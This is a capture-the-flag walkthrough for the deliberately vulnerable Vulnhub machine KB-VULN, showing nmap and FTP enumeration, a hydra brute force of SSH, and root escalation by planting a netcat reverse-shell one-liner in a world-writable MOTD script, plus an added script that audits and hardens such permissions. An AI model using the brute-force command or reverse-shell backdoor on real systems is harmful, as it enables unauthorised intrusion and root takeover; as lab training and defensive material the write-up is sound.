[VULNHUB] KB-VULN

Today we are going to hack the Vulnhub machine called KB-VULN. You can download it from the following link: http://vulnhub.com/entry/kb-vuln-1,540/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    ~ > nmap -A -p- 192.168.1.91
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 10:52 CEST
    Nmap scan report for 192.168.1.91
    Host is up (0.00064s latency).
    Not shown: 65532 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ::ffff:192.168.1.59
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 5
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 95:84:46:ae:47:21:d1:73:7d:2f:0a:66:87:98:af:d3 (RSA)
    |   256 af:79:86:77:00:59:3e:ee:cf:6e:bb:bc:cb:ad:96:cc (ECDSA)
    |_  256 9d:4d:2a:a1:65:d4:f2:bd:5b:25:22:ec:bc:6f:66:97 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: OneSchool — Website by Colorlib
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds
    We see that the FTP, SSH and HTTP ports are open. In the source code of the landing page we find the following comment:
    Username : sysadmin
    Meanwhile, we connect to the FTP server using the credentials anonymous/anonymous.
    ~/KB > ftp 192.168.1.91
    Connected to 192.168.1.91.
    220 (vsFTPd 3.0.3)
    Name (192.168.1.91:sml): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls -la
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxrwxr-x    2 1000     1000         4096 Aug 22 17:39 .
    drwxrwxr-x    2 1000     1000         4096 Aug 22 17:39 ..
    -rw-r--r--    1 0        0              54 Aug 22 17:39 .bash_history
    226 Directory send OK.
    There is a .bash_history file. We download it.
    ftp> get .bash_history
    local: .bash_history remote: .bash_history
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for .bash_history (54 bytes).
    226 Transfer complete.
    54 bytes received in 0.00 secs (73.3441 kB/s)
    ftp>
    Let's take a look at the contents of the file...
    ~/KB > cat .bash_history
    exit
    ls
    cd /etc/update-motd.d/
    ls
    nano 00-header
    exit
    We see that it "edits" the 00-header file. Only root should be able to edit that file: the scripts in /etc/update-motd.d are run as root (by pam_motd, through run-parts) every time someone logs in to the system, to build the message of the day. If we get access to the system and can write to that file, we can use it to escalate privileges. Since there is nowhere else to go, we brute-force SSH for the user we found in the web page comment, sysadmin.
    ~ > hydra -l sysadmin -P /usr/share/wordlists/rockyou.txt 192.168.1.91 ssh
    Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 10:56:37
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
    [DATA] attacking ssh://192.168.1.91:22/
    [22][ssh] host: 192.168.1.91   login: sysadmin   password: password1
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-10 10:56:54
    We found the password :) Let's log in!
  • Low Shell
  • ~ > ssh sysadmin@192.168.1.91
    sysadmin@192.168.1.91's password:

                WELCOME TO THE KB-SERVER

    Last login: Sat Aug 22 18:00:48 2020
    To run a command as administrator (user "root"), use "sudo <command>".
    See "man sudo_root" for details.

    sysadmin@kb-server:~$
  • user.txt
  • sysadmin@kb-server:~$ ls -la
    total 40
    drwxr-xr-x 5 sysadmin sysadmin 4096 Aug 22 18:04 .
    drwxr-xr-x 3 root     root     4096 Aug 22 17:53 ..
    -rw------- 1 sysadmin sysadmin   16 Aug 22 18:04 .bash_history
    -rw-r--r-- 1 sysadmin sysadmin  220 Apr  4  2018 .bash_logout
    -rw-r--r-- 1 sysadmin sysadmin 3771 Apr  4  2018 .bashrc
    drwx------ 2 sysadmin sysadmin 4096 Aug 22 17:02 .cache
    drwxrwxr-x 2 sysadmin sysadmin 4096 Aug 22 17:39 ftp
    drwx------ 3 sysadmin sysadmin 4096 Aug 22 17:02 .gnupg
    -rw-r--r-- 1 sysadmin sysadmin  807 Apr  4  2018 .profile
    -rw-r--r-- 1 root     root       33 Aug 22 17:54 user.txt
    sysadmin@kb-server:~$ cat user.txt
    48a365b4ce1e322a55ae9017f3daf0c0
  • Privilege Escalation
  • We check whether we can modify the 00-header file, as noted earlier...
    sysadmin@kb-server:~$ ls -l /etc/update-motd.d/00-header
    -rwxrwxrwx 1 root root 989 Aug 22 17:08 /etc/update-motd.d/00-header
    We can :) The file is owned by root but is world-writable (0777). We edit it and append a line at the end that sends a reverse shell back to our machine; because pam_motd runs the script as root, the shell we get back runs as root.
    sysadmin@kb-server:~$ nano /etc/update-motd.d/00-header
    echo "\n\t\t\tWELCOME TO THE KB-SERVER\n"
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.59 8888 >/tmp/f
    We start a nc listener.
    ~ > nc -nlvp 8888
    listening on [any] 8888 ...
    We log in again as sysadmin and get the reverse shell. The SSH login itself appears to hang while the reverse shell is open, because pam_motd waits for 00-header to finish; that is expected, and every later login will trigger the payload again until the file is restored.
    ~ > nc -nlvp 8888
    listening on [any] 8888 ...
    connect to [192.168.1.59] from (UNKNOWN) [192.168.1.91] 52826
    /bin/sh: 0: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(root) groups=0(root)
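    The root cause of this escalation is a root-run script that a non-root user can write to. The following is an added example, not code from the original writeup or from the KB-VULN box: a small POSIX shell audit that lists group- or world-writable files in a MOTD script directory, and a hardening step that strips the write bits, which is how the 0777 00-header above should have been fixed. The function names (writable_scripts, audit_motd_dir, harden_motd_dir) and the scratch directory it demos on are assumptions of this example; pass /etc/update-motd.d as the argument to run it for real (it needs root to chmod root-owned files there).

```shell
#!/bin/sh
# Added example (not from the original writeup): audit and harden a MOTD
# script directory. On Ubuntu, pam_motd runs every executable in
# /etc/update-motd.d as root via run-parts at each login, so a group- or
# world-writable script there (like the 0777 00-header on KB-VULN) lets any
# local user run commands as root. The directory is a parameter so the check
# can be exercised on a scratch tree. Function names are assumptions.

# List regular files directly inside DIR that are writable by group or others.
# -perm -g+w / -perm -o+w is POSIX find syntax; -maxdepth is GNU/BSD.
writable_scripts() {
    find "$1" -maxdepth 1 -type f \( -perm -g+w -o -perm -o+w \) | sort
}

# Return 0 if DIR has no group/world-writable scripts, 1 if it has any,
# printing the offending paths to stderr.
audit_motd_dir() {
    bad=$(writable_scripts "$1")
    if [ -n "$bad" ]; then
        printf 'writable root-run script(s) in %s:\n%s\n' "$1" "$bad" >&2
        return 1
    fi
    return 0
}

# Strip group/other write bits from every offending script in DIR and
# print how many files were changed.
harden_motd_dir() {
    n=$(writable_scripts "$1" | wc -l | tr -d ' ')
    find "$1" -maxdepth 1 -type f \( -perm -g+w -o -perm -o+w \) \
        -exec chmod go-w {} +
    echo "$n"
}

# Demo on a constructed scratch directory mirroring what the box exposed:
# 00-header world-writable (the bug) next to a correctly 0755 script.
demo_dir=$(mktemp -d)
printf '#!/bin/sh\necho "WELCOME TO THE KB-SERVER"\n' > "$demo_dir/00-header"
printf '#!/bin/sh\necho "help text"\n' > "$demo_dir/10-help-text"
chmod 0777 "$demo_dir/00-header"
chmod 0755 "$demo_dir/10-help-text"

if audit_motd_dir "$demo_dir"; then
    echo "audit clean"
else
    echo "fixed $(harden_motd_dir "$demo_dir") file(s)"
    audit_motd_dir "$demo_dir" && echo "audit clean after hardening"
fi
rm -rf "$demo_dir"
```

    The permission check is deliberately separate from ownership: a file in /etc/update-motd.d that is not owned by root is also a finding, but chown needs root, so on a real host combine this with `find /etc/update-motd.d ! -user root` and fix ownership by hand.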
  • root.txt
  • # cd /root
    # ls
    flag.txt
    # cat flag.txt
    1eedddf9fff436e6648b5e51cb0d2ec7
    #
  • End
  • And with that we are root on the machine.